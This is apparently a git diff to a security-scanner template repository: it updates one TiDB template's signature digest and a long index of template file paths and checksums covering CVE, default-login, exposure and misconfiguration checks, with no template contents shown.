tags: network,tidb,db,misconfig
|
||||
|
||||
tcp:
|
||||
- host:
|
||||
|
@ -24,4 +24,4 @@ tcp:
|
|||
- "mysql_native_password"
|
||||
- "TiDB"
|
||||
condition: and
|
||||
# digest: 4b0a00483046022100e049b1c055324354cc32587bf2b1adb5f41ae71e0470fa51e45ae3c0349605fb02210090caa87661256bffc263735cf58cbc73eadd15af8c05f627baebba0c3c5e5e3e:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4b0a0048304602210080382e3d0d64072e7aeb74e7b56c3b9081e554f2ce57ee36b6fe778c39567ffa022100cd086a1912176473d7ec2411f0b8a8b421e8b31f805bc41ae8c37fa2c1cbb3e2:922c64590222798bb761d5b6d8e72950
|
|
@ -10,7 +10,7 @@ TOP-10.md:06a54531fef2bfc5ec2fa38485a3e30c247a3132
|
|||
cloud/enum/aws-app-enum.yaml:26d0dcf57c7ba8003940ed1d53a62971564b2018
|
||||
cloud/enum/aws-s3-bucket-enum.yaml:0d101b898bbaebceea4020963d11829f8167029f
|
||||
cloud/enum/azure-db-enum.yaml:3d29a3c86288356d862922ef0527de99187bf734
|
||||
cloud/enum/azure-vm-cloud-enum.yaml:d40729aac7a1bfc55ceaf617c16a08c78fe9600f
|
||||
cloud/enum/azure-vm-cloud-enum.yaml:6d9043c907009b2ff6afc6cd09bd35a6d27f6fe9
|
||||
cloud/enum/azure-website-enum.yaml:037397591c799d32eb8abc94a346ff0805d68204
|
||||
cloud/enum/gcp-app-engine-enum.yaml:b22ff0601a3f7f6ddc39e39ab9dc34410d213e41
|
||||
cloud/enum/gcp-bucket-enum.yaml:896300c26517adf67feb80304f5edb25590a03c4
|
||||
|
@ -97,16 +97,16 @@ code/privilege-escalation/linux/rw-sudoers.yaml:f974b1d1a68fd7a8cd24b6f1b61855dd
|
|||
code/privilege-escalation/linux/sudo-nopasswd.yaml:3117c141f35b9229b6ebe1db10a4fef77aa6ee17
|
||||
code/privilege-escalation/linux/writable-etc-passwd.yaml:c0ad4796f42aab9c901b52b52b91940172d070e9
|
||||
config/README.md:48976bdcd95e99dbc8d6d2a9004df27e0bfa8494
|
||||
config/bugbounty.yml:d45915281bcb027c5aac65ec0f66fda4c914bd12
|
||||
config/bugbounty.yml:05aaced1241dba5b3c3b37559269b1cae473f52f
|
||||
config/cloud.yml:454e596d8ca3f19213b148f6c54c20806cb87a8e
|
||||
config/compliance.yml:367b57e7e900f92bc8d9e5883e635e975da0cae9
|
||||
config/osint.yml:683fe1e52716d054760d707dbc123f5e09de5418
|
||||
config/pentest.yml:c7b04a39e2efaf1a5f627da9b49ecf714d927f0e
|
||||
config/pentest.yml:e3a9ebe543e9c2d046ead1efc292394b54a55196
|
||||
config/privilege-escalation.yml:325607b721fcea55111f8698b10951fd2f0d17b8
|
||||
config/recommended.yml:eb4d0cb29634218f0279692e8c59fa1906d7148c
|
||||
config/recommended.yml:adcd4e1f0ef7b6b8c57fddbdda3ebf2314a8fa9b
|
||||
contributors.json:951e2ab8bbae42da01f52da9ef0a14ce7f17e159
|
||||
cves.json:51d8ac58d8ffdf6cfd4660d3e19373bb08bb6605
|
||||
cves.json-checksum.txt:fdca644f563bcfe217c57881fc5991db50a942e4
|
||||
cves.json:3b21f179e553a113562af785def57c341b663071
|
||||
cves.json-checksum.txt:e03adc785e821e31dd4936f083dc56fbb0b302df
|
||||
dns/azure-takeover-detection.yaml:34e8e8a0db3e2ff7af0bf8df8ee9c54f2ee8e3b4
|
||||
dns/caa-fingerprint.yaml:71845ba0a32b1968e23b507166275ee4c1f84b24
|
||||
dns/detect-dangling-cname.yaml:0c5204f22465c8ebb8ae31e6265ffa5c0cd4b6e2
|
||||
|
@ -122,8 +122,11 @@ dns/mx-service-detector.yaml:197d6c83e04011fc0ae267e999cad25e85a19d58
|
|||
dns/nameserver-fingerprint.yaml:7a9247d4f45a9699418b4afed5cea0388b147735
|
||||
dns/ptr-fingerprint.yaml:ecff55b058dba2ad98432eacea8b52ce1d8e7656
|
||||
dns/servfail-refused-hosts.yaml:ee2505b5619921a20332494f2281664eaf01fa87
|
||||
dns/soa-detect.yaml:5c758030190eea7fc6934a23dd266362ee2a355b
|
||||
dns/spf-record-detect.yaml:6aad264acb43bab9f128417e59b116cb7b35868e
|
||||
dns/spoofable-spf-records-ptr.yaml:7cb8aa2d5fa1b19224a6ca0b17c5b46377892ee7
|
||||
dns/txt-fingerprint.yaml:eca4bcdfb25f2922e233e4801f1beb27893f7e70
|
||||
dns/txt-service-detect.yaml:c331256e50faf2211d80f1f973f42c748d86a5d1
|
||||
dns/worksites-detection.yaml:c54ce778fe66a138e794b87520392f285c8b6259
|
||||
file/android/adb-backup-enabled.yaml:4ca96a12120754577166567e047e6735d1214891
|
||||
file/android/biometric-detect.yaml:27a81bc01a126a6923c702d556dac9da857971d8
|
||||
|
@ -973,7 +976,7 @@ http/cves/2012/CVE-2012-2371.yaml:c9b170834b0f6878fbd65a84289f9dde6cdf6edf
|
|||
http/cves/2012/CVE-2012-3153.yaml:9632dbed943428a3ce82bd26243e96bb53e0101f
|
||||
http/cves/2012/CVE-2012-4032.yaml:c433e79a48badc5d9996e22bcd1939ee98401e92
|
||||
http/cves/2012/CVE-2012-4242.yaml:d4acd90297d0e2c72a092b7a02a3cd8d9b532923
|
||||
http/cves/2012/CVE-2012-4253.yaml:8191f7e69d1dbec2c0b9ea2f687eafa87eeb2214
|
||||
http/cves/2012/CVE-2012-4253.yaml:22bb780ede0f6ee252aa15a98a2b1c8d437494e4
|
||||
http/cves/2012/CVE-2012-4273.yaml:d7e6647482c7d87038483b2bc94a26745bb3c841
|
||||
http/cves/2012/CVE-2012-4547.yaml:d254026e048515763754a600a75aab80318b79f5
|
||||
http/cves/2012/CVE-2012-4768.yaml:61df87600a157bab6ca0ae1244cf87d5dbb36af7
|
||||
|
@ -1199,7 +1202,7 @@ http/cves/2017/CVE-2017-16894.yaml:0c7f7d0bdb16cdff6e7a380ba56208eb1ca9d6e6
|
|||
http/cves/2017/CVE-2017-17043.yaml:b45105c0de0d90d61a79191de73976e9cd4fb790
|
||||
http/cves/2017/CVE-2017-17059.yaml:d40f8c2b908798457c9b02fa98a480b8bc0a7215
|
||||
http/cves/2017/CVE-2017-17451.yaml:04b0b3fec8b256c76cef8ea892836c2e420878b8
|
||||
http/cves/2017/CVE-2017-17562.yaml:d3e0e64e607cfaaace054ae2b40fd4b792f19b92
|
||||
http/cves/2017/CVE-2017-17562.yaml:2e22c184cd57f7425fba3827242a122c39dc86e8
|
||||
http/cves/2017/CVE-2017-17731.yaml:1666574cd4dfc7a3995867c7c4b621b267b885ff
|
||||
http/cves/2017/CVE-2017-17736.yaml:877434782e6a2c5b3095498877a022c3551b6ca8
|
||||
http/cves/2017/CVE-2017-18024.yaml:6b154b9615599e11764e703081eca6329935ee5e
|
||||
|
@ -1496,7 +1499,7 @@ http/cves/2019/CVE-2019-16932.yaml:182fef4932dc7931c45cd3d7aebdaeef9ded81e8
|
|||
http/cves/2019/CVE-2019-16996.yaml:ad524a9c60b54d610e8c55acaa46e4958a9b8dce
|
||||
http/cves/2019/CVE-2019-16997.yaml:e103b4c103866170ecfaef2fcf0e2cf88609b940
|
||||
http/cves/2019/CVE-2019-17270.yaml:8f282f5849f13dda11bbb8837079bb223d9687fb
|
||||
http/cves/2019/CVE-2019-17382.yaml:8b758f47cbcdde1a0409b679b261ccf5fcbd7d50
|
||||
http/cves/2019/CVE-2019-17382.yaml:f76bdf75f84fdcae6c031cc28c3420d8dc40f808
|
||||
http/cves/2019/CVE-2019-17418.yaml:dbeea758a5b8de4c18d2d8790798711113d69195
|
||||
http/cves/2019/CVE-2019-17444.yaml:7b94376c34d962236141cba63543376257005654
|
||||
http/cves/2019/CVE-2019-17503.yaml:6701aacab1ee79d24acd3cbd1497fb50399ad671
|
||||
|
@ -2398,7 +2401,7 @@ http/cves/2022/CVE-2022-1933.yaml:97c269db3367ffd56494243b090e307b4eb0b586
|
|||
http/cves/2022/CVE-2022-1937.yaml:f888a42c920fb30ae5b563bf642af334cd97da95
|
||||
http/cves/2022/CVE-2022-1946.yaml:982f4f9519b1a137a8d2f2c71c7f2225cb67da1d
|
||||
http/cves/2022/CVE-2022-1952.yaml:4c4d64ceb64295942d0d9c2c1ae79a9bc6a16ee7
|
||||
http/cves/2022/CVE-2022-2034.yaml:a56290dfd329c3ac92bf63ca31f9a8ccfafd7386
|
||||
http/cves/2022/CVE-2022-2034.yaml:6d1a2c994d2ebda1cdcdc84b36237565c66c592a
|
||||
http/cves/2022/CVE-2022-21371.yaml:e9b20049b90afecb519db58387e5922047ef5944
|
||||
http/cves/2022/CVE-2022-21500.yaml:7a87435ea2a54ac9c454a344a87fd21e51758b36
|
||||
http/cves/2022/CVE-2022-21587.yaml:9e40fc00a04665d81ac142e197d40f1926a521c6
|
||||
|
@ -2480,7 +2483,7 @@ http/cves/2022/CVE-2022-25489.yaml:5c5c7a7388f9e133b0cf380bad27eeaebb0c2a74
|
|||
http/cves/2022/CVE-2022-25497.yaml:07424dc06af0ea2d10c5aa1a201ce4d0f2d26848
|
||||
http/cves/2022/CVE-2022-2551.yaml:a2dc5d4686710a2e9aeea1bdadf8f7fac2f3766f
|
||||
http/cves/2022/CVE-2022-25568.yaml:aabffcf5827e7ee05211b2651ca350e913371665
|
||||
http/cves/2022/CVE-2022-2599.yaml:3acebe0eef8eedb44906ac2579e6d0f0024a48d3
|
||||
http/cves/2022/CVE-2022-2599.yaml:f576fefcf8da91a4c868c4b06cad0a2ed36884cb
|
||||
http/cves/2022/CVE-2022-26134.yaml:788a7f51e1550cc5770aab979234ac35b54d2505
|
||||
http/cves/2022/CVE-2022-26138.yaml:15d0534ab6765d2e536070eda15d020e04f43abc
|
||||
http/cves/2022/CVE-2022-26148.yaml:f37f9182974b9dd8d49af32a7ef9841fe7d704ae
|
||||
|
@ -2819,7 +2822,7 @@ http/cves/2023/CVE-2023-24278.yaml:e397c7d647c7517b78e44dbc79c8fcbc80480623
|
|||
http/cves/2023/CVE-2023-24322.yaml:c4b5cc0d4d70fa16682f706a954b95c84e0e7896
|
||||
http/cves/2023/CVE-2023-24367.yaml:dab63258fffca6b44d754ede551d56eea925a477
|
||||
http/cves/2023/CVE-2023-24488.yaml:8a381e70fd0643ed5d1371edb70b40e25e9b5ff8
|
||||
http/cves/2023/CVE-2023-24489.yaml:c8aa249866735b4ad90a721d721d9e9426628ad8
|
||||
http/cves/2023/CVE-2023-24489.yaml:c895cc71b777b3ada793ebcddd00274157f7927d
|
||||
http/cves/2023/CVE-2023-24657.yaml:1efdbfecef2aacf600fb007989d4efc6aa9d7fbe
|
||||
http/cves/2023/CVE-2023-24733.yaml:f1b740ac9ba1fc859deb3c69798e1bc3d302ed4e
|
||||
http/cves/2023/CVE-2023-24735.yaml:e38322978b1598d32056adb11572c6c401107c40
|
||||
|
@ -3055,7 +3058,7 @@ http/cves/2023/CVE-2023-5244.yaml:32f7df605dda4c16610c548f773673f5b69c67a5
|
|||
http/cves/2023/CVE-2023-5360.yaml:387bf52196ed2e1d383a97ea158fe90b94d213b9
|
||||
http/cves/2023/CVE-2023-5375.yaml:394c4b2b0867a8922fcfad500616380c117983d8
|
||||
http/cves/2023/CVE-2023-5556.yaml:7d50d6e2861161f90b7876147d3405d5c7eeccf4
|
||||
http/cves/2023/CVE-2023-5830.yaml:85965a9925a1cd03639181416b2c20995b33f501
|
||||
http/cves/2023/CVE-2023-5830.yaml:76c2cd53d3eb9187c00e98e057fa4cdd29412e6a
|
||||
http/cves/2023/CVE-2023-5914.yaml:93f627b753ac975d5a74a2532a42aa9449682207
|
||||
http/cves/2023/CVE-2023-6018.yaml:e840e467eab7d472ae719996be481de06fafb2cf
|
||||
http/cves/2023/CVE-2023-6020.yaml:68c05fb386a060d81834e2ddbaefb5779ae81b51
|
||||
|
@ -3085,6 +3088,7 @@ http/cves/2024/CVE-2024-1071.yaml:672dd1ef0240ede4f06d3b98caf96f2f14bd1e8e
|
|||
http/cves/2024/CVE-2024-1208.yaml:6f0363cecc95a2187f9fbca30620a2d39d87eb15
|
||||
http/cves/2024/CVE-2024-1209.yaml:36f848394da33f75c2198b8f5b9081f212b3ecd1
|
||||
http/cves/2024/CVE-2024-1210.yaml:1333fe26c55e1b4e44bcfdc0e0de5226a053f949
|
||||
http/cves/2024/CVE-2024-1212.yaml:5671b80e9ab3c9274bd98bbeb8fe508980393f85
|
||||
http/cves/2024/CVE-2024-1698.yaml:86f5580473ce4a829a4279af9ad763b52bfd4983
|
||||
http/cves/2024/CVE-2024-1709.yaml:7f5ad668e9c8e5ab56afee96df8907d7ccc71e0b
|
||||
http/cves/2024/CVE-2024-21644.yaml:e8d58594c2dc1021f9107eee925f11791e0627e7
|
||||
|
@ -3101,6 +3105,7 @@ http/cves/2024/CVE-2024-25735.yaml:bb8f329838a1758c223d85cdbe23c820f8b61640
|
|||
http/cves/2024/CVE-2024-27198.yaml:c4f066c0332dea8b23c9aa0990baa6b6b5c806bb
|
||||
http/cves/2024/CVE-2024-27199.yaml:6004f38f3a24fbb3a951270191c4af21b6e14e2d
|
||||
http/cves/2024/CVE-2024-27497.yaml:5ee80d14253ccdeec8c2bdc1c7e82a8062b4f487
|
||||
http/cves/2024/CVE-2024-27954.yaml:d1056017d0cbf62dc6a2b0b6372ca2980992155c
|
||||
http/default-logins/3com/3com-nj2000-default-login.yaml:3c260ca4c2ee7809221fc4b9330a540795c081ce
|
||||
http/default-logins/UCMDB/ucmdb-default-login.yaml:627864b8eb2c47b7c717e1ed1800ba39eee5410c
|
||||
http/default-logins/abb/cs141-default-login.yaml:a5902dd34ba373c6f4e2cba15adbd9bf1e75e9c7
|
||||
|
@ -3108,7 +3113,7 @@ http/default-logins/activemq/activemq-default-login.yaml:d9c1716e5fab0e3cdd0ebaa
|
|||
http/default-logins/adminer-default-login.yaml:1dc0fbedf2bb856303230bf3c5be9f2ad1bf9f0e
|
||||
http/default-logins/aem/aem-default-login.yaml:932701c69be0aa181e7b40a5a6189ba34578015b
|
||||
http/default-logins/aem/aem-felix-console.yaml:43658ba960762d06a5c8be673078e3049cb7e71f
|
||||
http/default-logins/alibaba/canal-default-login.yaml:2c0e5475e64363fb8ec6f6748768c09a9da193de
|
||||
http/default-logins/alibaba/canal-default-login.yaml:53bee91e5473ba3be493bdb74fc8b2789b6f72fd
|
||||
http/default-logins/alphaweb/alphaweb-default-login.yaml:c70e96a6e9ed34b5fe721cc25c004aa4c66a59c9
|
||||
http/default-logins/ambari/ambari-default-login.yaml:c7f2072fb639a02e718d877dcc7369f02f4a8cfe
|
||||
http/default-logins/apache/airflow-default-login.yaml:f4a72dcfe661dbfb227717d3201877b185af4d7b
|
||||
|
@ -3206,7 +3211,7 @@ http/default-logins/ofbiz/ofbiz-default-login.yaml:2e6eea7863853fca0a5546a479d43
|
|||
http/default-logins/openemr/openemr-default-login.yaml:e47d165fc7a306238827e4ea1497307f932890cd
|
||||
http/default-logins/openmediavault/openmediavault-default-login.yaml:efb418987e7a7b80b6fc9ea78f883b4dcaa90efe
|
||||
http/default-logins/oracle/businessintelligence-default-login.yaml:29309871b052bb3f05de613e838dadb92dd47f79
|
||||
http/default-logins/oracle/peoplesoft-default-login.yaml:6ee288c848a0c5a046e206b7f245a50f886e72d6
|
||||
http/default-logins/oracle/peoplesoft-default-login.yaml:21071ffc4b0449f88570d4d604038756ccd18209
|
||||
http/default-logins/others/aruba-instant-default-login.yaml:398f77a4e4e01153465c51bdfeb3cf53f670a85b
|
||||
http/default-logins/others/ciphertrust-default-login.yaml:9d29315f7fd68f1e4f55dd046bf7c716658ef13e
|
||||
http/default-logins/others/cnzxsoft-default-login.yaml:71898b0928c2f380612addb0350fb686dd84e025
|
||||
|
@ -3292,7 +3297,7 @@ http/exposed-panels/acunetix-panel.yaml:b10cd9d4a29dea26e161ddeb85b6b920efd69870
|
|||
http/exposed-panels/addonfinance-portal.yaml:38506f2dd6a3a69108a50fe67a2686af99398590
|
||||
http/exposed-panels/adhoc-transfer-panel.yaml:dcce7565c43f4ea78e2a3ad9fc8216f301f05c94
|
||||
http/exposed-panels/adiscon-loganalyzer.yaml:fc2432f93a3fd7724c3f0d2814d41c065e0b8b21
|
||||
http/exposed-panels/adminer-panel-detect.yaml:e1426681f4d6c9e2502bc10a2327e73b6fa9113e
|
||||
http/exposed-panels/adminer-panel-detect.yaml:2c1c41366071aef22dcd3f0fb77608e8ba4d18d8
|
||||
http/exposed-panels/adminer-panel.yaml:b266fbab664e4ee130429e725409cf78000739e0
|
||||
http/exposed-panels/adminset-panel.yaml:2be3fbb1ec0fe028405fdb0353163d1352a14d65
|
||||
http/exposed-panels/adobe/adobe-component-login.yaml:ca846d96566ad14a055b85c15bd2b61e3a786d8d
|
||||
|
@ -4111,6 +4116,7 @@ http/exposed-panels/skycaiji-admin-panel.yaml:361c2ff751869e4b694246e113ceaf3e0c
|
|||
http/exposed-panels/slocum-login.yaml:882558fc76eedef7ba2f13a9011a298046d85fe5
|
||||
http/exposed-panels/smartping-dashboard.yaml:95eec001a41f2fe0c66ebfc58e0560cd9755e5cd
|
||||
http/exposed-panels/snapcomms-panel.yaml:2415e99a631ec5250f3f9be63e99f91d15d6f494
|
||||
http/exposed-panels/softether-vpn-panel.yaml:9c37a5f904da87f0cc892b4a675a6b50432e2708
|
||||
http/exposed-panels/solarview-compact-panel.yaml:be95efca10dca1f6b755b1d7e6f91e4f77e0594f
|
||||
http/exposed-panels/solarwinds-arm-panel.yaml:2aaf482c52b633dfe17bad946cfed56da0282d0f
|
||||
http/exposed-panels/solarwinds-orion.yaml:d04c286187f0f4b310d767196124eead9bab0a89
|
||||
|
@ -4340,7 +4346,7 @@ http/exposures/apis/wadl-api.yaml:7a728eb7a4cb779218d582661a7fb2978abedc03
|
|||
http/exposures/apis/wsdl-api.yaml:e28378d37cb724e50ad74e13158210a704a2d9df
|
||||
http/exposures/backups/exposed-mysql-initial.yaml:546b26c48697aa27b99c9d385c509b1af10e8907
|
||||
http/exposures/backups/froxlor-database-backup.yaml:a8296d723d545dea6b9d898766db58cc8f06c984
|
||||
http/exposures/backups/php-backup-files.yaml:6af27377a944a299aee9bf4c4dbd8b60b99b8224
|
||||
http/exposures/backups/php-backup-files.yaml:2c05d22cc231014da2a5964eee452bf96706b391
|
||||
http/exposures/backups/settings-php-files.yaml:4deb7ac78c1f7df72c6efad11c7ce77373c3ba7b
|
||||
http/exposures/backups/sql-dump.yaml:e989e8b4ad56b0ed996c7dc9cec7eab2210c223c
|
||||
http/exposures/backups/zip-backup-files.yaml:0b4309555d6a4f0fee56b49d302d209baccb808e
|
||||
|
@ -4524,7 +4530,6 @@ http/exposures/files/desktop-ini-exposure.yaml:e1f2848de5e29a1d1f0069c15a5451d38
|
|||
http/exposures/files/django-secret-key.yaml:9a9152c6627c7d1bb85923caedf61303f26e78b9
|
||||
http/exposures/files/docker-cloud.yaml:1cd831e6d009b49e120b14206b7a19b825fd5272
|
||||
http/exposures/files/domcfg-page.yaml:28b2f74eed60f6bf047db658ffcf8ccbacfb90a4
|
||||
http/exposures/files/drupal-install.yaml:becf211637e4dbbe6b1f0fa018d53f4ea23de648
|
||||
http/exposures/files/ds-store-file.yaml:679fb351af4567e417c0697f8d3298ddc14767b4
|
||||
http/exposures/files/dwsync-exposure.yaml:811dc04f9ef973b6d48e8b007590508b61230b4b
|
||||
http/exposures/files/environment-rb.yaml:cfd936dc5174ec7eee345830477ad8ee013d5eb4
|
||||
|
@ -4533,6 +4538,7 @@ http/exposures/files/filezilla.yaml:a04a2de7145d42c6cc63a59edf5c13c9660218b5
|
|||
http/exposures/files/ftpconfig.yaml:37d46a4726edffd9d686224d0a3be7df6ec2780d
|
||||
http/exposures/files/gcloud-access-token.yaml:62d8288a11a5350a01d3e0041ac28c92b7889910
|
||||
http/exposures/files/gcloud-credentials.yaml:2343f7b00527e9831a765ea61960df72176b1bf1
|
||||
http/exposures/files/generic-db.yaml:36dc57f7db3eac512d56d7d54f0bb767cbb7fe88
|
||||
http/exposures/files/get-access-token-json.yaml:81c5d4a38a413cda6fbf584f3a955d89dc48a28d
|
||||
http/exposures/files/git-mailmap.yaml:456e18f1c474d4628acc7356b1f816f1fee19fcf
|
||||
http/exposures/files/github-gemfile-files.yaml:451504bab87de4abd36fd46ad03629bdc24ffe5e
|
||||
|
@ -4822,19 +4828,19 @@ http/exposures/tokens/zendesk/zendesk-key.yaml:002e66de48b921b1485a90c9ee0b8202d
|
|||
http/exposures/tokens/zenserp/zenscrape-api-key.yaml:a8b850b2efaae638efc02b5d207fe6bc855610e9
|
||||
http/exposures/tokens/zenserp/zenserp-api-key.yaml:dc1d18779abf2831c2b624b8cebad22f57bad735
|
||||
http/exposures/tokens/zoho/zoho-webhook-token.yaml:213408cbf1610741f4f31da89e8dba8f3d5b20eb
|
||||
http/fuzzing/cache-poisoning-fuzz.yaml:0dea0da9f14667463434dd2938455cb041e9de7a
|
||||
http/fuzzing/header-command-injection.yaml:f35e69a5b540b432355364ce314be23d0dfe72de
|
||||
http/fuzzing/iis-shortname.yaml:878ffbd680260e7de82515ae139572b9d076ba40
|
||||
http/fuzzing/linux-lfi-fuzzing.yaml:6d09bdb021b1d2f04197a1afcb5566f94c345578
|
||||
http/fuzzing/mdb-database-file.yaml:44368401b80d528a53411419188d8654cc01092a
|
||||
http/fuzzing/prestashop-module-fuzz.yaml:1770351eb8024ad210d1773b851f15a92f523bf6
|
||||
http/fuzzing/ssrf-via-proxy.yaml:67a0e37236d363d42d148494ee00f3fb55372ce3
|
||||
http/fuzzing/valid-gmail-check.yaml:5322234e7caccea4fe57c3ec8ea7e5b6b91317e6
|
||||
http/fuzzing/waf-fuzz.yaml:6b9237448f006d60291634510ac4d910fb73ca0c
|
||||
http/fuzzing/wordpress-plugins-detect.yaml:3bb133a2a5af6333133a4d1afc69b7253325e071
|
||||
http/fuzzing/wordpress-themes-detect.yaml:81452a0c2201364547a722b3268c3cc9be19fbad
|
||||
http/fuzzing/wordpress-weak-credentials.yaml:3688f4121a6862a3ec2177a0c28c6f0aaea1cfe8
|
||||
http/fuzzing/xff-403-bypass.yaml:3988407398c98a0f521e0251aafe2738470ed895
|
||||
http/fuzzing/cache-poisoning-fuzz.yaml:f98fed523a1e8b80a6c5c12183c6f072bb81cf5e
|
||||
http/fuzzing/header-command-injection.yaml:bf0af66d12ef68c553a7a0d496f469788f3d03c3
|
||||
http/fuzzing/iis-shortname.yaml:aafbc44fc50e604004bf52f14b83354e24163827
|
||||
http/fuzzing/linux-lfi-fuzzing.yaml:a92bbc9f1c966c3f909279c49e2dee0a2bfffac9
|
||||
http/fuzzing/mdb-database-file.yaml:f6bb4e9e482516e6a861cc1efc68063e61778d13
|
||||
http/fuzzing/prestashop-module-fuzz.yaml:8e7f0e0bd609549e38f8eadc603360e8a56f2a02
|
||||
http/fuzzing/ssrf-via-proxy.yaml:8b57f45fe9d33268b5ae1dcd1a73301a47dfee62
|
||||
http/fuzzing/valid-gmail-check.yaml:a91c4df030cbeb5d163df9a3150cb146eb495412
|
||||
http/fuzzing/waf-fuzz.yaml:0bf3b44516d1eab46bbc11fb2eada0293c76a2ad
|
||||
http/fuzzing/wordpress-plugins-detect.yaml:4bd980e6a9b9246896b0961dbff25a199038bcf0
|
||||
http/fuzzing/wordpress-themes-detect.yaml:86b90c67fd9c7fb48a6eff67fdb63a185f402ea8
|
||||
http/fuzzing/wordpress-weak-credentials.yaml:13dbc34b62167f75f802b83a3e71d89387ba54a6
|
||||
http/fuzzing/xff-403-bypass.yaml:23f78013ddcc53b07fbc3a114f0eaa45f90001d5
|
||||
http/honeypot/citrix-honeypot-detect.yaml:a632cb08a12e2d3dfe69f8b4e8d0cbd4d44cbbc5
|
||||
http/honeypot/dionaea-http-honeypot-detect.yaml:7830d2af83e16b50c0a4b647defe89c9ac5efe25
|
||||
http/honeypot/elasticpot-honeypot-detect.yaml:73cb47452335d2c4e95f07bdbaabcb7800b634aa
|
||||
|
@ -4895,7 +4901,7 @@ http/miscellaneous/balada-injector-malware.yaml:46e26d3735f737c251df9a46d7091f3d
|
|||
http/miscellaneous/clientaccesspolicy.yaml:f1ce4622fb979da2754ffba7bf52cdfe3fc470d0
|
||||
http/miscellaneous/crypto-mining-malware.yaml:10c82a94c2cf226eb22b8ac8e10dc88d8aa24387
|
||||
http/miscellaneous/defaced-website-detect.yaml:045ede38b93611039e21dc0f249ddebf3a5499e5
|
||||
http/miscellaneous/defacement-detect.yaml:b1ec2272ff1ecfdfa21cf8bec5620e26d325817e
|
||||
http/miscellaneous/defacement-detect.yaml:0636060c6c434c29a127d7cac1a29f86167d420e
|
||||
http/miscellaneous/detect-dns-over-https.yaml:46b316a9632c17d9cf75cbb27de9c706c9a14b0b
|
||||
http/miscellaneous/dir-listing.yaml:dad3bf5aa871745ab62bf6f4b61909bde637e326
|
||||
http/miscellaneous/email-extractor.yaml:5815f093718b70c0b64c4c423cd1ec8ab94f1281
|
||||
|
@ -4912,7 +4918,7 @@ http/miscellaneous/maxforwards-headers-detect.yaml:9d69555c1fc58f644b5ccf2644e0a
|
|||
http/miscellaneous/microsoft-azure-error.yaml:bfa3c53d4023d524a09ba3565bd3bf63204ac58a
|
||||
http/miscellaneous/moodle-changelog.yaml:9dbf59caabecc08967456fa3986046e33f4dbf43
|
||||
http/miscellaneous/netflix-conductor-version.yaml:31ad2c649ff4aa0703a5c7cd4e36d2245a8993e0
|
||||
http/miscellaneous/ntlm-directories.yaml:5f40ea6a1dda6cd8654e61902adb60b877945de5
|
||||
http/miscellaneous/ntlm-directories.yaml:8d52b0df9375267f6ba7840037a48a96cb971dda
|
||||
http/miscellaneous/old-copyright.yaml:de816764aefeaf59f75201740f4f82fb31071194
|
||||
http/miscellaneous/options-method.yaml:2e0edc5993baa53c6fb7e8307c80ea26254bc3e4
|
||||
http/miscellaneous/rdap-whois.yaml:c25cfe8b61f82c032de77398cf1aed94f56f0004
|
||||
|
@ -4958,7 +4964,7 @@ http/misconfiguration/aem/aem-secrets.yaml:346f23f7070fdf59c2c76fddd12a5eb4f31c7
|
|||
http/misconfiguration/aem/aem-security-users.yaml:ff974be49aaee03897db4a6d40117b9e5d02598d
|
||||
http/misconfiguration/aem/aem-setpreferences-xss.yaml:dd08fc188a7ad278c8ee3082b66d9d2282d1c9e8
|
||||
http/misconfiguration/aem/aem-sling-userinfo.yaml:f38274749b0668275a6b8cdddc2707bbde9eb1a0
|
||||
http/misconfiguration/aem/aem-userinfo-servlet.yaml:ad12a83b873c3e1bd09b0b675368f78013a26261
|
||||
http/misconfiguration/aem/aem-userinfo-servlet.yaml:4e42c3fd5d4ae21b1e0a686a35c69394d1d9d32b
|
||||
http/misconfiguration/aem/aem-wcm-suggestions-servlet.yaml:cc07ee10590df2dd7de1d03c73167bbd4d81b95b
|
||||
http/misconfiguration/aem/aem-xss-childlist-selector.yaml:a9ecdb229a17db9192821a583549813a1bb1fc3c
|
||||
http/misconfiguration/airflow/airflow-debug.yaml:c18746cecd6f440d9367f6ebe1ce70ff34e508af
|
||||
|
@ -5073,7 +5079,7 @@ http/misconfiguration/gitlab/gitlab-public-repos.yaml:1a2b426983d0ca449461a9ece3
|
|||
http/misconfiguration/gitlab/gitlab-public-signup.yaml:f604c8044baffdf63ed2215ccec5b5721202144b
|
||||
http/misconfiguration/gitlab/gitlab-public-snippets.yaml:64aa47f34d185b8bbbc04b242eb0a76886d641ec
|
||||
http/misconfiguration/gitlab/gitlab-uninitialized-password.yaml:d9959b940359896de41142fe765303a3627c7ae5
|
||||
http/misconfiguration/gitlab/gitlab-user-enum.yaml:f3372fa8a631a0249e5a108ac8e2d610a5a6ec71
|
||||
http/misconfiguration/gitlab/gitlab-user-enum.yaml:09ffd851b3108524029e04ca4f1a501e1c580757
|
||||
http/misconfiguration/gitlist-disclosure.yaml:8111ac3c10bc09b42d9c2bc565cd5758cb6a220e
|
||||
http/misconfiguration/global-traffic-statistics.yaml:f5ab7750ae4d32d8b857b8290bcd98ac1358fa0d
|
||||
http/misconfiguration/glpi-directory-listing.yaml:29bb88890e78f83428d00799224679dfd993e1bc
|
||||
|
@ -5129,6 +5135,7 @@ http/misconfiguration/installer/discourse-installer.yaml:cf9bf85966145a193efedf3
|
|||
http/misconfiguration/installer/dokuwiki-installer.yaml:a572ea8dd4751008cd46b4319fe478d147173ac7
|
||||
http/misconfiguration/installer/dolibarr-installer.yaml:6c971d39c8f61247ee422817192d8d1af5918a3f
|
||||
http/misconfiguration/installer/dolphin-installer.yaml:66ccbdc0d810c8fb5876d46e8c7780da1efd6057
|
||||
http/misconfiguration/installer/drupal-install.yaml:afa701be86d508093f72f596b7381ed76abd7c36
|
||||
http/misconfiguration/installer/easyscripts-installer.yaml:4cb8db53f08ed1bf8172866766c33878f579fda9
|
||||
http/misconfiguration/installer/eshop-installer.yaml:c83244265e0cd9499cee6ecfd6fda805b6475251
|
||||
http/misconfiguration/installer/espeasy-installer.yaml:051a8d1869f34a42c6d6a287ff2668c3b07c2b99
|
||||
|
@ -5320,9 +5327,9 @@ http/misconfiguration/proxy/metadata-hetzner.yaml:99b85a4199e83eff23ec416b6b6fff
|
|||
http/misconfiguration/proxy/metadata-openstack.yaml:6e1984d2e3aa87e07e6b7db80dbd7c9d10c9d417
|
||||
http/misconfiguration/proxy/metadata-oracle.yaml:93d94888c382735e755c96a1908859778f1308ef
|
||||
http/misconfiguration/proxy/open-proxy-external.yaml:e05b7e6f0744ee250192e9167a89b4d6c7dfdee1
|
||||
http/misconfiguration/proxy/open-proxy-internal.yaml:198c9a37e2ddb668d66fb1598d5f73784dca1a24
|
||||
